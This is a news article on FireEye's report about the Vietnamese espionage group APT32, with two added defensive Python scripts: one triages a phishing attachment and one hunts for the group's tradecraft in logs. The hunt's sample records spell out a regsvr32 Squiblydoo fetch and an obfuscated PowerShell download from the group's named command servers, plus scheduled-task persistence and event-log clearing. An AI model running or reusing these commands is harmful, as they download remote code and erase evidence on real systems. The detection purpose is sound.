APT32: Vietnamese Hackers Target Foreign Corporations
15.5.2017 securityweek APT
APT32 is the "newest named advanced persistent threat group," according to a new report from FireEye. Published yesterday, the report describes a sophisticated and well-resourced cyber espionage actor targeting Vietnamese interests around the globe; although not previously classified under the APTn naming scheme, the group has been operating since at least 2013. That naming scheme also dates to 2013, when Mandiant used it for APT1, the first hacking group it was willing to call 'state-sponsored'.
FireEye's analysis stops short of defining APT32 as another state-sponsored hacking group; but that is the clear suspicion. "APT32," writes Nick Carr, senior manager of FireEye's Mandiant Incident Response team, "leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests."
He subsequently told Reuters that it was impossible to identify or locate the hackers precisely, or to confirm that they were working for the Vietnamese government, but that the information they sought would be of very little use to any other party. He also said that in some cases the intrusions appeared to be assessing the victims' adherence to national regulations.
The Vietnamese government denies this. "The government of Vietnam does not allow any form of cyber-attacks against organizations or individuals," said foreign ministry spokeswoman Le Thi Thu Hang. "All cyber-attacks or threats to cybersecurity, must be condemned and severely punished in accordance with regulations and laws."
APT32's targets include a European corporation that was about to construct a manufacturing facility in Vietnam in 2014; numerous Vietnamese and foreign corporations in 2016; a hospitality developer planning to expand operations in Vietnam in 2016; and the Vietnamese offices of a global consulting firm in 2017. In all cases, espionage would give the Vietnamese government either a commercial advantage in negotiations or a better understanding of foreign companies operating in the country.
Other attacks, however, have targeted individuals outside Vietnam -- more specifically foreign governments, journalists, and members of the Vietnamese diaspora who, warns Carr, "may continue to be targeted."
FireEye's isolation of APT32 followed its investigations into intrusions at several corporations with business interests in Vietnam. These investigations provided "sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye's newest named advanced persistent threat group: APT32."
FireEye's analysis of APT32's current campaign depicts a well-resourced and innovative attacker. Initial access comes through phishing emails carrying a weaponized attachment. Unusually, the attachment is not a conventional Word document but an ActiveMime file, an undocumented Microsoft format that Word nevertheless opens; the ActiveMime wrapper contains an OLE compound file, and it is that embedded OLE file that carries the malicious macros.
The attacker also used a novel approach to track the success of its phishing emails, using legitimate cloud-based email analytics. The phishing attachment can contain HTML image tags. "When a document with this feature is opened," writes Carr, "Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms."
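The following is an added triage script, not FireEye's code or anything from the report, that shows the two attachment properties described above: it walks an MHTML attachment, lists the external image URLs whose fetch by Word would leak the reader's public IP to the attacker's web logs, and unwraps a base64 `editdata.mso` part into the OLE document it carries. The ActiveMime layout it assumes (the `ActiveMime` magic, a little-endian uint32 at offset 0x1E giving the start of a zlib stream that holds the OLE file) comes from open-source parsers such as oletools, not from the article; the sample attachment, its tracking URL under the reserved `.invalid` domain and the fake OLE body are all constructed.

```python
"""Triage an MHTML/ActiveMime phishing attachment (added example, not FireEye's).

Assumptions (not from the article): the ActiveMime layout follows what
open-source parsers such as oletools document - 'ActiveMime' magic at offset 0,
little-endian uint32 at offset 0x1E = start of a zlib stream holding the OLE file.
"""
import base64
import email
import re
import struct
import zlib
from email import policy

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # compound file header
ACTIVEMIME_MAGIC = b"ActiveMime"
ZLIB_OFFSET_FIELD = 0x1E                            # assumption, see docstring
MACRO_HINTS = (b"Macros", b"AutoOpen", b"Document_Open", b"_VBA_PROJECT")


def build_sample_attachment():
    """Constructed stand-in for the lure: MHTML with a 1x1 external image and a
    base64 'editdata.mso' part wrapping a fake OLE body that mentions AutoOpen."""
    fake_ole = OLE_MAGIC + b"\x00" * 24 + b"Macros/VBA/ThisDocument AutoOpen"
    header = bytearray(0x32)
    header[:len(ACTIVEMIME_MAGIC)] = ACTIVEMIME_MAGIC
    struct.pack_into("<L", header, ZLIB_OFFSET_FIELD, 0x32)
    mso = bytes(header) + zlib.compress(fake_ole)
    html = ('<html><body><p>Invoice attached</p>'
            '<img src="http://tracking.example.invalid/img/a1b2c3.png" width="1" height="1">'
            '</body></html>')
    return (
        "MIME-Version: 1.0\r\n"
        'Content-Type: multipart/related; boundary="----=_B"\r\n\r\n'
        "------=_B\r\n"
        'Content-Type: text/html; charset="us-ascii"\r\n'
        "Content-Transfer-Encoding: 7bit\r\n\r\n" + html + "\r\n"
        "------=_B\r\n"
        "Content-Location: file:///C:/x/editdata.mso\r\n"
        "Content-Transfer-Encoding: base64\r\n"
        "Content-Type: application/x-mso\r\n\r\n"
        + base64.encodebytes(mso).decode() +
        "------=_B--\r\n"
    ).encode()


def external_image_urls(html):
    """Remote <img src> targets: Word fetches these even with macros disabled."""
    return re.findall(r"<img[^>]+src=[\"']?(https?://[^\"'\s>]+)", html, re.I)


def extract_activemime(blob):
    """Return the OLE bytes wrapped in an ActiveMime blob, or None."""
    if not blob.startswith(ACTIVEMIME_MAGIC):
        return None
    offset = struct.unpack_from("<L", blob, ZLIB_OFFSET_FIELD)[0]
    try:
        return zlib.decompress(blob[offset:])
    except zlib.error:
        return None


def triage(data):
    """Walk every MIME part; collect tracking URLs and embedded OLE/macro hints."""
    msg = email.message_from_bytes(data, policy=policy.default)
    findings = {"image_urls": [], "ole_parts": 0, "macro_hints": []}
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b""
        if part.get_content_type() == "text/html":
            findings["image_urls"] += external_image_urls(payload.decode("latin-1"))
        ole = extract_activemime(payload)
        if ole and ole.startswith(OLE_MAGIC):
            findings["ole_parts"] += 1
            findings["macro_hints"] += [h.decode() for h in MACRO_HINTS if h in ole]
    return findings


if __name__ == "__main__":
    print(triage(build_sample_attachment()))
```

On a real sample the extracted OLE bytes would be handed to olevba or oledump to dump the VBA project; the byte-string hints here only flag that a macro project is likely present. The image URLs are what you would block or sinkhole if you want to open the lure in a sandbox without telling the sender that someone, and from which address, has read it.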
If the macros run, they create two scheduled tasks as persistence mechanisms for two backdoors. The first launches Squiblydoo, an application whitelisting bypass in which the signed, Microsoft-supplied regsvr32.exe is pointed at a remotely hosted scriptlet through scrobj.dll, to download a backdoor from APT32's infrastructure. The second delivers a secondary backdoor as a multi-stage PowerShell script configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.
APT32 also goes further than most in covering its tracks. "Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon's Invoke-Obfuscation framework," notes the analysis.
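The post-compromise behaviour described in the two paragraphs above (scheduled-task persistence, the Squiblydoo regsvr32/scrobj.dll bypass, callbacks to the named domains, event-log clearing and Invoke-Obfuscation-style PowerShell) is what a detection engineer would hunt for in endpoint telemetry. The script below is an added example, not FireEye's detection content, and runs over constructed log lines in a simplified tab-separated `timestamp, event ID, key=value...` form; real Sysmon or Windows event XML would be parsed into the same record first. The obfuscation token list and its threshold are assumptions to be tuned against your own baseline; Windows event IDs 1102 (Security log cleared) and 104 (other logs cleared) are real, while the sample records themselves are constructed.

```python
"""Hunt for APT32-style post-compromise tradecraft in process/event telemetry.
Added example, not FireEye's code or rules. Input: constructed records, one per
line: timestamp TAB event-id TAB key=value TAB key=value ...
"""
import re

# C2 domains named in the article (defanged there as blog.panggin[.]org etc.)
C2_DOMAINS = {"blog.panggin.org", "share.codehao.net", "yii.yiihao126.net"}

# Squiblydoo: regsvr32 told (/i:<url>) to load a remote scriptlet via scrobj.dll
SQUIBLYDOO = re.compile(r"regsvr32(\.exe)?\b.*\s/i:\S+.*scrobj\.dll", re.I)
# Scheduled-task creation, the persistence mechanism for both backdoors
SCHTASK = re.compile(r"schtasks(\.exe)?\s+/create\b", re.I)
# Log clearing by command, in case 1102/104 are not forwarded off the host
LOG_CLEAR_CMD = re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\b|Clear-EventLog", re.I)
# Tokens typical of Invoke-Obfuscation output: backticks, [char] casts, string
# reassembly with '+', -f format reordering ({1}{0}), -join, -bxor  (assumption)
OBF_TOKENS = re.compile(r"`|\[char\]|'\s*\+\s*'|-f\s*['\"(]|\{\d+\}|-join\b|-bxor\b", re.I)
OBF_THRESHOLD = 4   # assumption: tune against a baseline of benign PowerShell
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

SAMPLE_LOGS = [  # constructed records
    "2017-05-10T09:12:01Z\t1\tImage=C:\\Windows\\System32\\regsvr32.exe\t"
    "CommandLine=regsvr32.exe /s /n /u /i:http://share.codehao.net/init.sct scrobj.dll",
    "2017-05-10T09:12:03Z\t1\tImage=C:\\Windows\\System32\\schtasks.exe\t"
    "CommandLine=schtasks /create /sc minute /mo 30 /tn Updater /tr "
    "\"regsvr32 /s /n /u /i:http://share.codehao.net/init.sct scrobj.dll\"",
    "2017-05-10T09:12:05Z\t1\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "CommandLine=powershell.exe -nop -w hidden -c \"&('I'+'E'+'X')"
    "(('{1}{0}'-f'R http://yii.yiihao126.net/s1','IW'))\"",
    "2017-05-10T09:20:00Z\t1102\tChannel=Security\tSubjectUserName=svc_deploy",
    "2017-05-10T09:21:00Z\t1\tImage=C:\\Windows\\System32\\notepad.exe\t"
    "CommandLine=notepad.exe C:\\Users\\a\\report.txt",
    "2017-05-10T09:22:00Z\t1\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "2017-05-10T09:23:00Z\t1\tImage=C:\\Windows\\System32\\wevtutil.exe\t"
    "CommandLine=wevtutil.exe cl Microsoft-Windows-PowerShell/Operational",
]


def parse(line):
    """Split one record into a dict; '_ts' and '_eid' hold timestamp and event ID."""
    ts, event_id, *kvs = line.rstrip("\n").split("\t")
    rec = dict(kv.split("=", 1) for kv in kvs)
    rec["_ts"], rec["_eid"] = ts, event_id
    return rec


def rules_for(rec):
    """Return the set of rule names that fire on a single record."""
    hits = set()
    cmd = rec.get("CommandLine", "")
    image = rec.get("Image", "").lower()
    if rec["_eid"] in ("1102", "104"):
        hits.add("log_cleared")
    if SQUIBLYDOO.search(cmd):
        hits.add("squiblydoo")
    if SCHTASK.search(cmd):
        hits.add("sched_task_created")
    if LOG_CLEAR_CMD.search(cmd):
        hits.add("log_clear_command")
    if image.endswith("powershell.exe") and len(OBF_TOKENS.findall(cmd)) >= OBF_THRESHOLD:
        hits.add("obfuscated_powershell")
    if {h.lower().rstrip(".") for h in URL_HOST.findall(cmd)} & C2_DOMAINS:
        hits.add("known_c2_domain")
    return hits


def hunt(lines):
    """Return (timestamp, rule, detail) alerts for every record that fires a rule."""
    alerts = []
    for line in lines:
        rec = parse(line)
        detail = rec.get("CommandLine") or rec.get("Channel", "")
        for rule in sorted(rules_for(rec)):
            alerts.append((rec["_ts"], rule, detail))
    return alerts


if __name__ == "__main__":
    for ts, rule, detail in hunt(SAMPLE_LOGS):
        print(f"{ts}  {rule:22}  {detail[:70]}")
```

Two caveats a practitioner will recognise: the article says APT32 cleared *select* entries, and neither 1102/104 nor the `wevtutil cl` rule will catch selective tampering, which is why forwarding logs off the host as they are written matters more than any on-host rule; and the obfuscation score is a heuristic, so it should be paired with Script Block Logging (event 4104), which records the de-obfuscated code PowerShell actually executes.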
It is APT32's use of a custom suite of backdoors that has helped FireEye tie different campaigns to this one group. That suite includes Windshield, Komprogo, Soundbite and Phoreal, alongside Beacon, the payload of the commercially available Cobalt Strike framework. "FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests," writes Carr. He warns that APT32 demonstrates that state-sponsored cyber espionage is no longer limited to the few well-known actors: China, Iran, Russia, and North Korea.
"As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets."